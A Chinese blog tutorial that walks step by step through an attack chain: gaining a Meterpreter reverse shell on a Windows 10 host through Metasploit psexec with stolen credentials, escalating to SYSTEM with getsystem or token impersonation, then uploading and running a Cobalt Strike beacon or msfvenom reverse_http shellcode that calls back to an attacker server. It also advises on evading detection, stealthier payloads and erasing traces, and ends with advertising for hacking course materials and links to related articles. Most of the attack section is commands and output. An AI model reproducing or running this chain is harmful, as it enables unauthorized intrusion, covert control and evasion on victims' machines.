黑客技术零基础入门之MSF上线到CS工具中可执行的实战方案(非常详细)

于 2025-04-22 13:59:36 发布
阅读量1.1k 收藏 16
点赞数 41
文章标签: web安全 计算机 网络安全 黑客技术 渗透测试 干货分享 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cxyxx12/article/details/147415585
版权

文章目录

  • 描述如何使用 Metasploit(msf)提权目标主机到 SYSTEM 权限,并将提权后的会话迁移到 Cobalt Strike 工具中。

实际案例背景

  • 目标系统:Windows 10(存在已知的权限提升漏洞或可利用的令牌)
  • 初始情况:已通过 Metasploit 成功获取一个低权限的 Meterpreter 会话。
  • 目标
    • 提权到 SYSTEM 权限。
    • 将提权后的会话转移到 Cobalt Strike 中管理和控制。

步骤详解

1. 获取低权限 Meterpreter 会话
1.1 使用 Metasploit 获取会话
  1. 启动 Metasploit 控制台:
msfconsole
  1. 使用一个合适的漏洞模块,例如 SMB 远程代码执行(假设已经有弱口令或凭证):
use exploit/windows/smb/psexec
  1. 设置攻击参数:
set RHOSTS <目标IP>
set SMBUser <用户名>
set SMBPass <密码>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <本地IP>
set LPORT 4444
  1. 执行攻击:
exploit

成功后会得到一个低权限的 Meterpreter 会话,例如:

[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.150:49215)
2. 提权到 SYSTEM 权限
2.1 使用 getsystem 自动提权
  1. 切换到低权限会话:
sessions -i 1
  1. 尝试自动提权:
getsystem

  1. 可能的返回:
[*] Got SYSTEM via technique 1.
  1. 验证提权结果:
getuid

如果返回:

Server username: NT AUTHORITY\SYSTEM

则说明提权成功。

2.2 如果 getsystem 失败:使用令牌冒充 (incognito 模块)
  1. 加载 incognito 扩展:
load incognito
  1. 列出可用令牌:
list_tokens -u

可能看到:

[*] Available tokens:
    NT AUTHORITY\SYSTEM
    DOMAIN\Administrator
  1. 冒充 SYSTEM 令牌:
impersonate_token "NT AUTHORITY\\SYSTEM"
  1. 再次验证权限:
getuid

应返回 SYSTEM 权限。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

3. 上线到 Cobalt Strike
3.1 生成 Cobalt Strike Payload (Beacon)

  • 在 Cobalt Strike 中生成 Payload(Beacon)。

  • Cobalt Strike Console -> Cobalt Strike 菜单 -> Attacks -> Packages -> Windows Executable (S)。

  • 选择 Payload 类型:windows/beacon_http/reverse_http 或其他你配置的类型。

  • 配置监听器、域名、端口等参数。
  • 导出为可执行文件 (EXE) 或 Shellcode (RAW/BIN)。
  • 将 Payload 上传到目标系统。 在 Meterpreter 会话中:
upload /home/hao/12.exe C:\\Windows\\Temp\\12.exe

3.2 在目标系统上执行 Beacon Payload
  • 在 Meterpreter 中,执行上传的 Beacon:
execute -f C:\\Windows\\Temp\\14.exe

  • Cobalt Strike 会自动捕获到 Beacon 会话(如果配置正确的话)。
    • 在 Cobalt Strike 中,导航到 View -> Beacons 查看上线的会话。
    • 若成功,则会在 Beacon 管理界面看到新上线的会话,权限应为 SYSTEM。

3.3 使用 Meterpreter 转发会话到 Cobalt Strike

如果无法直接执行 Beacon Payload,也可以使用 msfvenom 生成 Shellcode 并在 Cobalt Strike 中监听。步骤如下:

  • 生成 Raw Shellcode (Cobalt Strike 控制台):
msfvenom -p windows/meterpreter/reverse_http LHOST=<Cobalt Strike 服务器IP> LPORT=80 -f raw > /tmp/cs_shellcode.raw

  • 上传并注入 Shellcode
    • 上传:

upload /tmp/cs_shellcode.raw C:\\Windows\\Temp\\cs_shellcode.raw
  • 注入:
execute -f C:\\Windows\\Temp\\cs_shellcode.raw
  • Cobalt Strike 捕获会话
    • 同样在 View -> Beacons 中查看。
4. 验证与稳定控制
  1. 验证 SYSTEM 权限
    在 Cobalt Strike 的 Beacon 控制台中执行:
shell whoami

应返回:

NT AUTHORITY\SYSTEM

  1. 保持会话稳定

    • 使用 Cobalt Strike 的 Sleep 功能,设置通信时间间隔,避免被防火墙检测。
    • 配置 HTTPS 或 DNS 通道,增加隐蔽性。

  2. 清理痕迹

    • 删除上传的 Payload 和临时文件:
rm C:\\Windows\\Temp\\beacon.exe

*   使用 Cobalt Strike 的 **Artifact Kit** 生成更隐蔽的 Payload。
5. 整体项目方案总结
前期准备
  • 确保 Metasploit 和 Cobalt Strike 配置正确。
  • 确保目标环境合法授权,并已获取初始的 Meterpreter 低权限会话。
提权阶段
  • 优先尝试 getsystem 提权,失败则用 incognito 进行令牌冒充。
  • 确保成功获得 SYSTEM 权限。
上线 Cobalt Strike
  • 生成 Beacon Payload 并通过 Meterpreter 执行上线。
  • 确保会话成功捕获,并能稳定通信。
后续管理
  • 使用 Cobalt Strike 的功能进行进一步横向移动、信息收集与持久化。
  • 合理使用 Sleep 和加密通信,避免被检测。
注意事项
  • 合法授权:所有步骤必须在目标系统所有者明确授权下进行。
  • 权限验证:每一步都要及时验证当前权限,避免操作失败。
  • 安全清理:完成后,及时清理所有上传的工具和脚本,避免留下痕迹。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

内网安全学习()---CS&MSF联动
qi_SJQ_的博客
02-17 3821
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 558
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
003-MSF恶程木马+cs上线
qq_57017823的博客
08-31 568
msfvenom,钓鱼攻击,键盘监听
内网渗透—Socks代理协议&主机不出网&CS-MSF控制上线
2301_76227305的博客
05-22 2597
那么什么是代理呢,我们本地可以直接访问windows server2008,无法直接访问win7。但是windows server2008可以直接访问win7,因为他们有同一网段的ip嘛。那么我们可以拿到windows server2008控制权,然后让它转发我们本地的流量到win7,那么server2008就充当了我们访问win7的代理。例如,有个包裹要从广州到深圳,但是包裹自己到达不了目的地,那么我们可以让快递公司代替我们把包裹送到深圳,此时快递公司就充当我们的代理。
MSF恶意程序利用——CS上线
陳Huid的博客
08-07 935
申明:本篇文章的用意仅做学习使用!
MSFCS联动】
一纸荒芜的博客
08-27 3066
msfcs
eBSploit适用于内网渗透中遇到MS17-010漏洞的情况快速上线公网msfcs,同时支持自定义dll命令执行、会话迁移等操作 .zip
11-29
eBSploit适用于内网渗透中遇到MS17-010漏洞的情况快速上线公网msfcs,同时支持自定义dll命令执行、会话迁移等操作。eBSploit永恒之蓝windows快速使用工具Github项目https://github.com/Anyyy111/eBSploit声明本...
基础电子中的MSF业务框架与IMS的关系
11-14
2006年的全球测试活动展示了MSF R3执行协议在多运营商环境中的实用性。 **下一代网络(NGN)与IMS** 下一代网络标准化组织已经确认IMS作为NGN的关键组成部分,它提供了一个统一的业务控制平台。IMS实现了业务、...
详细!!简单使用kali中MSF渗透安卓模拟器操作实战MSF生成安卓APK(制作客户端)
2401_83640658的博客
02-11 1733
简单实战一下使用kali中MSF制作安卓木马渗透控制安卓虚拟机。本次讲解只适用于渗透安卓虚拟机,有兴趣可以实操一下。
多模态大模型入门指南(非常详细零基础入门到精通,收藏这一篇就够了
Hacker_doggy的博客
07-17 3423
如表1所示,对26 SOTA MM-LLMs的架构和训练数据集规模进行了全面比较。随后,简要介绍这些模型的核心贡献并总结了它们的发展趋势。代表了一系列视觉语言 (VL) 模型,旨在处理交错的视觉数据和文本,生成自由格式的文本作为输出。(2)BLIP-2引入了一个资源效率更高的框架,包括用于弥补模态差距的轻量级 Q-Former ,实现对冻结 LLMs 的充分利用。利用 LLMs,BLIP-2 可以使用自然语言提示进行零样本图像到文本的生成。(3)LLaVA。
后渗透之MSF联动CS
dl1286670932的博客
12-14 617
Cobalt Strike(简称CS)是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,分为服务器和客户端。MSF这边已经成功获得一台主机会话,需要将这个会话上线CSCS这边成功上线了一台主机,同MSF一致。可以看到后台开启的软件服务进程。MSF这里输入payload。CS这边新建一个监听器。
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 2056
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
MSF上线CS工具实战方案(可执行方案)
最新发布
浩策盾悟
04-04 6058
下面我将详细描述如何使用 Metasploit(msf)提权目标主机到 SYSTEM 权限,并将提权后的会话迁移到 Cobalt Strike 工具中。此操作流程仅用于合法授权的渗透测试或实验室环境,禁止用于非法用途。
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 2217
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
msfcs互相传动
weixin_44110913的博客
10-10 1729
CS->MSF MSF: use exploit/multi/handler set payload windows/meterpreter/reverse_http CS: 创建监听器windows/foreign/reverse_http 执行监听器 spawn msf MSF->CS MSF: background use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http C
MSFCS联动
GoDunTong's Blog
04-08 4444
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
msfcs互传,msfcs建立frp穿透
qq_42430287的博客
04-13 1999
msfcs互传,msfcs建立frp穿透
细说——CS联动MSF
LainWith的博客
08-06 7136
目录环境准备CS ——> MSFubuntu准备cs客户机器准备msf准备补充MSF ——> CSMSF准备ubuntu-cs准备 网上的文章,写的很简介,看的脑壳疼,自己动手,详实的记录一下学习过程 环境准备 我使用两台vps,一台是kali 52.69.164.3,一台是ubuntu 52.194.218.196​ kali使用msf,ubuntu使用cs服务器,物理机使用cs客户端,虚拟机win7是受害者 CS ——> MSF 简单来说,就是当cs拿到一台主机之后,新增一个用于转发
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值